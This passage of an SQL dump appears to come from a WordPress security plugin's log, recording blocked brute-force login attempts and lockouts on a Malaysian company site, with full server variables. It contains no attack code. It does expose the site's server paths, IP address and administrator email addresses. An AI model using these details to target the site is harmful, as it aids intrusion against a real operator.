Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.55.177\";s:11:\"REMOTE_PORT\";s:5:\"11390\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNoHDeXPjITQfYLwk4isgAAAJQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568892956.3074\";s:12:\"REQUEST_TIME\";s:10:\"1568892956\";}}','notice','2019-09-19 11:35:58','2019-09-19 11:35:56',18258112,19558280,'https://bintara.com.my/xmlrpc.php',1,0,'157.230.55.177'),(25152,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"40212\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNkg9Ahg@A20WI2ffiPEAAAARA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568892035.655\";s:12:\"REQUEST_TIME\";s:10:\"1568892035\";}}','notice','2019-09-19 11:20:37','2019-09-19 11:20:36',18259488,19559664,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.134.39'),(25153,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.55.177\";s:11:\"REMOTE_PORT\";s:5:\"10266\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNoE9Ahg@A20WI2ffiQBAAAAQw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568892947.2626\";s:12:\"REQUEST_TIME\";s:10:\"1568892947\";}}','notice','2019-09-19 11:35:49','2019-09-19 11:35:47',17731760,19222520,'https://bintara.com.my/wp-login.php',1,0,'157.230.55.177'),(25151,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"39578\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNkfuDEKCiNBjk42kc5zgAAANM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568892030.9088\";s:12:\"REQUEST_TIME\";s:10:\"1568892030\";}}','notice','2019-09-19 11:20:33','2019-09-19 11:20:32',17746088,19237592,'https://bintara.com.my/wp-login.php',1,0,'162.144.134.39'),(25288,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX@xHkXpgmG5P@iB8kKWQAAAJg\";s:12:\"REDIRECT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.175.6\";s:11:\"REMOTE_PORT\";s:5:\"48894\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX@xHkXpgmG5P@iB8kKWQAAAJg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569062596.385\";s:12:\"REQUEST_TIME\";s:10:\"1569062596\";}}','notice','2019-09-21 10:43:17','2019-09-21 10:43:16',18314312,19610680,'https://bintara.com.my/wp/xmlrpc.php',1,0,'128.199.175.6'),(25285,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:43:12\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:43:12\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:58:12\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:58:12\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:43:13','2019-09-21 10:43:12',17888912,19290400,'https://bintara.com.my/blog/wp-login.php',1,0,'62.164.176.194'),(25286,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:43:13','2019-09-21 10:43:12',18095008,19290400,'https://bintara.com.my/blog/wp-login.php',1,0,'62.164.176.194'),(25287,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX@wnkXpgmG5P@iB8kKWAAAAII\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"62.164.176.194\";s:11:\"REMOTE_PORT\";s:5:\"50364\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX@wnkXpgmG5P@iB8kKWAAAAII\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062595.0644\";s:12:\"REQUEST_TIME\";s:10:\"1569062595\";}}','notice','2019-09-21 10:43:16','2019-09-21 10:43:15',18314944,19612000,'https://bintara.com.my/blog/xmlrpc.php',1,0,'62.164.176.194'),(25282,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:43:09\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:43:09\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:58:09\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:58:09\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:43:11','2019-09-21 10:43:09',17885616,19286528,'https://bintara.com.my/wp/wp-login.php',1,0,'128.199.175.6'),(25283,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:43:11','2019-09-21 10:43:09',18091592,19286528,'https://bintara.com.my/wp/wp-login.php',1,0,'128.199.175.6'),(25284,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX@wHkXpgmG5P@iB8kKVwAAAIc\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"62.164.176.194\";s:11:\"REMOTE_PORT\";s:5:\"49748\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX@wHkXpgmG5P@iB8kKVwAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062592.1716\";s:12:\"REQUEST_TIME\";s:10:\"1569062592\";}}','notice','2019-09-21 10:43:13','2019-09-21 10:43:12',17804096,19290400,'https://bintara.com.my/blog/wp-login.php',1,0,'62.164.176.194'),(25281,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX@vXkXpgmG5P@iB8kKVgAAAJE\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.175.6\";s:11:\"REMOTE_PORT\";s:5:\"47886\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX@vXkXpgmG5P@iB8kKVgAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062589.4704\";s:12:\"REQUEST_TIME\";s:10:\"1569062589\";}}','notice','2019-09-21 10:43:11','2019-09-21 